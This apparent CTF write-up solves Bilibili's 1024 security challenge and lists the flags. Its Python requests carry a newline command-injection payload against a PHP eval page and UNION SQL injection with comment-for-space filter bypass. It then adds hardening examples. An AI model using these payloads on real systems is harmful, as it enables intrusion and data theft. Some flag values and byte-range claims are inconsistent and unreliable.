Reference answers
Question 1: a1cd5f84-27966146-3776f301-64031bb9
Question 2: 36c7a7b4-cda04af0-8db0368d-b5166480
Question 3: 9d3c3014-6c6267e5-086aaee1f18452a
Question 4: 3d5dd579-0678ef93-18b70cae-cabc5d51
Question 5: 516834cc-50e448af-bcf9ed53-9ae4328e
Question 6: b13981f4-5ae996d4-bc04be5b-34662a78
Question 7 (partial IP list, scored 10 points): bba.ja.cca.beg, bba.ja.ccb.cbc, bbb.bb.bjd.bgc, bbb.bb.bjd.bha, bbb.bb.bjd.bhc, bbb.bb.bjd.bhf, bfh.ff.dj.bcf, bfh.ff.dj.bd, bfh.ff.dj.fb, bfh.ff.dj.ig, bfh.ff.dj.jf, cd.baf.cae.cbc, cd.bb.cai.cbh, cdd.bcc.bg.bib, cde.ced.bbb.dd, dc.bb.ii.jj, jj.bdc.bbb.cc

I recently noticed that Bilibili launched a 1024 Programmers' Day event with a technical competition, split into an algorithm-and-security quiz and a security attack-and-defense challenge. The attack-and-defense challenge has 7 questions, including APP reverse engineering and decryption. For a crawler engineer, reverse-analysis skills are essential as well, so K哥 tried the two reverse-engineering questions from a crawler engineer's point of view, found that reverse engineering is not that hard, and wants to share his thoughts. (This looks at attack-and-defense problems from a crawler engineer's angle; internet security experts, please go easy! Some of the solution ideas come from internet security experts.)

For some of the web security questions, refer to the security expert's write-up: https://xingye.me/?p=389
1024 Programmers' Day event: https://www.bilibili.com/blackboard/20211024.html
Security attack-and-defense challenge: https://security.bilibili.com/sec1024/

Question 1: Encryption and decryption

The first question gives a string of ciphertext and no hints at all. As a crawler engineer, K哥 reflexively opened F12 and read through the source. There is a form with method="post" and a div tag with id "success", so the first suspicion was: decrypt the ciphertext, send a POST request, and the flag appears under the div with the success id? K哥 then went through the JS code, since JS encryption is what crawler engineers run into most often, and found that jQuery and a common.js file are loaded; searching for tags and the like turned up nothing useful.

Since there is no JS encryption, this should be a hard-coded ciphertext. Observe that it looks like two 48-character ciphertexts, or perhaps one 96-character ciphertext, and there are no special symbols such as ==, so it cannot be the simplest MD5. K哥 still tried it, splitting it into six 16-character pieces, three 32-character pieces and other combinations, and confirmed it was not MD5. He then tried a variety of encryption algorithms, using one half as the KEY and the other as the ciphertext, or the whole string as the ciphertext; SHA, HMAC, RC4 and the others did not work either. Looking at the web page again more carefully, K哥 wondered whether happy_1024_2233 is also part of the encryption: is it the salt value (IV value, also called the offset)? Could it be the KEY? After many attempts, the conclusion was:

Encryption: AES
Mode: ECB
Padding: makes no difference, any works
Key: happy_1024_2233
96-character ciphertext: e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156
Output format: Hex (hexadecimal)
Decryption result (flag): a1cd5f84-27966146-3776f301-64031bb9

For the principles and implementation of the various encryption algorithms, see K哥's earlier article: [Crawler Knowledge] Common encryption and decryption algorithms for crawlers.

Question 2

cda04af0-8db0368d-b5166480, sitting right in the comments of the home.vue page, as shown in the figure below:

Question 3: The best language

The third question says that PHP is the best language in the world and hands you an eval.php, as shown in the picture:

The idea for solving this one comes from the internet security expert linked above. Download eval.php and you can see the regex /^\w+$/. This pattern still matches when the input ends with a newline character, and the newline lets a Linux command run on the following line. Use ls in the root directory by sending a GET request to http://security.bilibili.com/...[]=1%0a&args[]=ls:

```python
import requests

url = "http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=ls"
response = requests.get(url=url)
print(response.text)
```

Returned content: 1.txt, passwd, data, config. The flag is in passwd; ignore the rest and simply run the Linux command cat passwd by sending a GET request to http://security.bilibili.com/...[]=1%0a&args[]=cat&args[]=passwd:

```python
import requests

url = "http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd"
response = requests.get(url=url)
print(response.text)
```

This returns the flag: 9d3c3014-6c6267e7-086aaee5-1f18452a

Question 4: SQL injection

Same approach: find the button on the page, click the log information and you can see the log request, so start from the log API. The captured log API is https://security.bilibili.com/sec1024/q/admin/api/v1/log/list. Try to get past the space filter and see what is echoed back; send the POST requests with Python (PS: note how the user_name field changes in each request):

```python
import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {"user_id": "", "user_name": "1/**/union/**/select/**/database(),user(),3,4,5", "action": "", "page": 1, "size": 20}
response = requests.post(url=url, json=json_data)
print(response.text)
```

Returned content:

```
{"code":200,"data":{"res_list":[{"action":"4","id":"q","time":"5","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}
```

Get the table names:

```python
import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {"user_id": "", "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#", "action": "", "page": 1, "size": 20}
response = requests.post(url=url, json=json_data)
print(response.text)
```

The returned content gives three tables: flag, log and user:

```
{"code":200,"data":{"res_list":[{"action":"4","id":"q","time":"flag,log,user","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}
```

Get the columns of the flag table. Quotes cannot be used, so use hex instead: flag in hex is 666c6167:

```python
import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {"user_id": "", "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name=0x666c6167#", "action": "", "page": 1, "size": 20}
response = requests.post(url=url, json=json_data)
print(response.text)
```

The returned content shows a single column, id:

```
{"code":200,"data":{"res_list":[{"action":"4","id":"q","time":"id","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}
```

Finally, take the flag directly:

```python
import requests

url = "https://security.bilibili.com/sec1024/q/admin/api/v1/log/list"
json_data = {"user_id": "", "user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(id)/**/from/**/flag#", "action": "", "page": 1, "size": 20}
response = requests.post(url=url, json=json_data)
print(response.text)
```

The returned content carries 3d5dd579-0678ef93-18b70cae-cabc5d51 as the flag:

```
{"code":200,"data":{"res_list":[{"action":"4","id":"q","time":"3d5dd579-0678ef93-18b70cae-cabc5d51","user_id":"test@10.34.12.128","user_name":"3"}],"total":1},"msg":""}
```

Question 5: APP reverse engineering

Question 5 is an Android reverse-engineering problem, as shown in the figure: drop it into an emulator and it asks for a username and password; a wrong one shows the prompt "一点点~", and if it is correct you should get the flag. Throw the apk straight into JADX: there is no obfuscation and the code is clear at a glance, with this Encrypt class standing out the most:

Analysing the code: in MainActivity.java, the entered username and password are assigned to obj and obj2, then the methods in Encrypt are called, which do a bitwise XOR with 3 followed by base64 encoding. Arrays.equals then compares the processed username and password against the correct ones, and if they match it outputs bilibili-(?-?)つロ干杯~. Not complicated; you can reproduce it in Java, or work backwards to the correct username and password in Python. When reproducing it in Python, note that the correct username and password are given as Java byte arrays. Python has no such thing as a Java byte array, and conceptually the value range of a byte differs too: Python 3 is 0~256, Java is -127~128, so when converting you need to shift by 256. The full Python derivation is:

```python
import base64

# The two Java byte arrays copied from Encrypt (base64 text, one byte per element)
byte_arr1 = [78, 106, 73, 49, 79, 122, 65, 51, 89, 71, 65, 117, 78, 106, 78, 109, 78, 122, 99, 55, 89, 109, 85, 61]
byte_arr2 = [89, 87, 66, 108, 79, 109, 90, 110, 78, 106, 65, 117, 79, 109, 74, 109, 78, 122, 65, 120, 79, 50, 89, 61]

# Map Java's signed bytes onto Python's unsigned range before decoding
byte_arr1_ = bytes(b % 256 for b in byte_arr1)
byte_arr2_ = bytes(b % 256 for b in byte_arr2)
bs64_arr1 = base64.b64decode(byte_arr1_)
bs64_arr2 = base64.b64decode(byte_arr2_)

# Undo the XOR with 3 byte by byte
username = password = ""
for i in range(len(bs64_arr1)):
    username += chr(bs64_arr1[i] ^ 3)
for i in range(len(bs64_arr2)):
    password += chr(bs64_arr2[i] ^ 3)

print("username:", username)
print("password:", password)
print("flag:", username + "-" + password)
```

Output:

```
username: 516834cc-50e448af
password: bcf9ed53-9ae4328e
flag: 516834cc-50e448af-bcf9ed53-9ae4328e
```

Enter the username and password in the emulator app; the test succeeds:

Question 6: IDA reverse SO

Question 6 is the same as Question 5 except for the flag. It requires reversing the SO library, which checks the ABI and the system version: in build.prop change ro.product.cpu.abi to x86 and ro.build.version.release to 9, then create /data/2233. Grouped 4 bytes at a time, this becomes the flag: b13981f4-5ae996d4-bc04be5b-34662a78

Question 7: Risk control, malicious IPs

The last question asks you to find all malicious IPs and submit them as a comma-separated string; the score depends on the number of correct IPs. I had no idea how to judge this one. K哥 tried extracting all IPs with Python, put them into Excel and picked out the IPs that repeat too often:

bba.ja.cca.beg, bba.ja.ccb.cbc, bbb.bb.bjd.bgc, bbb.bb.bjd.bha, bbb.bb.bjd.bhc, bbb.bb.bjd.bhf, bfh.ff.dj.bcf, bfh.ff.dj.bd, bfh.ff.dj.fb, bfh.ff.dj.ig, bfh.ff.dj.jf, cd.baf.cae.cbc, cd.bb.cai.cbh, cdd.bcc.bg.bib, cde.ced.bbb.dd, dc.bb.ii.jj, jj.bdc.bbb.cc

This answer only scored 10 points; in fact a single correct IP already gives 10 points, and full marks are 20, so the list probably has both wrong and missing entries. This question is definitely not that simple, and other judgment methods are needed, such as looking at the UA, Path and Referer, or repeated visits from the same UA across different IPs. Experts with ideas are welcome to discuss them in the comments.

Summary

Some of the questions are fairly simple, but there are no hints. As with Question 1, you need to know the various encryption algorithms well to infer the scheme quickly; otherwise you can only try them one by one. The remaining questions need some web security knowledge; fellow crawler engineers can give them a try too.
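For Question 3, an added example (not code from the original post) that reproduces the eval.php regex check in Python, whose `$` behaves like PCRE's: the pattern from the challenge accepts an input ending in a newline, while anchoring with \Z (the PHP equivalent is \z, or the D modifier) rejects it. The inputs are constructed.

```python
import re

# The pattern from eval.php. Without the MULTILINE flag, "$" matches at the end of
# the string AND just before a single trailing "\n", so "1\n" still passes.
WEAK = re.compile(r"^\w+$")

# "\Z" matches only at the very end of the string (PHP: "\z", or the "D" modifier),
# so a trailing newline can no longer hide behind the anchor.
STRICT = re.compile(r"^\w+\Z")


def weak_is_word(value: str) -> bool:
    """The check as written in the challenge."""
    return WEAK.match(value) is not None


def strict_is_word(value: str) -> bool:
    """Hardened check; re.fullmatch(r"\w+", value) would be an equivalent fix."""
    return STRICT.match(value) is not None


def audit(values):
    """Return the inputs the weak check accepts but the strict check rejects."""
    return [v for v in values if weak_is_word(v) and not strict_is_word(v)]


# Constructed inputs; "1\n" is what args[]=1%0a decodes to on the server.
INPUTS = ["1", "abc_123", "1\n", "1\nls", "a b", ""]

if __name__ == "__main__":
    for value in INPUTS:
        print(repr(value), "weak:", weak_is_word(value), "strict:", strict_is_word(value))
    print("slips through:", audit(INPUTS))  # only "1\n"
```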
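For Question 4, an added example (not the challenge's own code) that rebuilds a space-and-quote blocklist in front of a concatenated query on an in-memory SQLite database with constructed log and flag tables, next to the same query with a bound parameter. The payload keeps the write-up's /**/ shape but drops the MySQL-only database(), user() and trailing # so that SQLite can parse it; the hex table-name trick is MySQL-specific and is not reproduced.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the challenge's log and flag tables."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE log(id TEXT, user_id TEXT, user_name TEXT, action TEXT, time TEXT);
        INSERT INTO log VALUES('1', 'u1', 'alice', 'login', '2021-10-24');
        CREATE TABLE flag(id TEXT);
        INSERT INTO flag VALUES('flag{constructed-sample}');
    """)
    return con


def naive_filter_ok(value):
    """The kind of blocklist the write-up defeats: it only looks for spaces and quotes."""
    return " " not in value and "'" not in value and '"' not in value


COLS = "id, user_id, user_name, action, time"


def vulnerable_list(con, user_name):
    """String concatenation behind a blocklist. Every space is written as /**/,
    so the UNION passes the filter and is parsed as SQL anyway."""
    if not naive_filter_ok(user_name):
        return []
    return con.execute(f"SELECT {COLS} FROM log WHERE user_name={user_name}").fetchall()


def safe_list(con, user_name):
    """Bound parameter: the whole payload is compared as one literal string."""
    return con.execute(f"SELECT {COLS} FROM log WHERE user_name=?", (user_name,)).fetchall()


# Same shape as the write-up's final payload, minus the MySQL-only parts.
PAYLOAD = "1/**/union/**/select/**/1,2,3,4,group_concat(id)/**/from/**/flag"

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_list(db, PAYLOAD))  # the flag surfaces in the 'time' column
    print(safe_list(db, PAYLOAD))        # []
```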
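For Question 7, an added example (not the author's Excel workflow) that scores constructed access-log lines with three of the heuristics suggested above: per-IP request volume, number of 4xx responses per IP, and one User-Agent spread across many IPs. The log format, thresholds and every IP, path and UA are made up for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed log lines: "ip method path status "user-agent"".
LOG_LINES = """\
203.0.113.7 GET /login 200 "scanner/1.0"
203.0.113.7 GET /admin 403 "scanner/1.0"
203.0.113.7 GET /.env 404 "scanner/1.0"
203.0.113.7 GET /wp-login.php 404 "scanner/1.0"
198.51.100.2 GET / 200 "Mozilla/5.0"
198.51.100.3 GET /video/1 200 "Mozilla/5.0"
192.0.2.10 POST /api/login 401 "bot-x"
192.0.2.11 POST /api/login 401 "bot-x"
192.0.2.12 POST /api/login 401 "bot-x"
192.0.2.13 POST /api/login 401 "bot-x"
""".splitlines()

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def parse(lines):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield {"ip": m[1], "method": m[2], "path": m[3], "status": int(m[4]), "ua": m[5]}


def suspicious_ips(lines, max_hits=3, max_errors=2, max_ips_per_ua=3):
    """IPs over the request or 4xx thresholds, plus every IP behind a UA seen from too many IPs."""
    hits, errors, ua_ips = Counter(), Counter(), defaultdict(set)
    for rec in parse(lines):
        hits[rec["ip"]] += 1
        if 400 <= rec["status"] < 500:
            errors[rec["ip"]] += 1
        ua_ips[rec["ua"]].add(rec["ip"])
    flagged = {ip for ip, n in hits.items() if n > max_hits}
    flagged |= {ip for ip, n in errors.items() if n > max_errors}
    for ips in ua_ips.values():
        if len(ips) > max_ips_per_ua:
            flagged |= ips
    return sorted(flagged)


def submission(lines):
    """Comma-separated string in the format the challenge asks for."""
    return ",".join(suspicious_ips(lines))


if __name__ == "__main__":
    print(submission(LOG_LINES))
```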
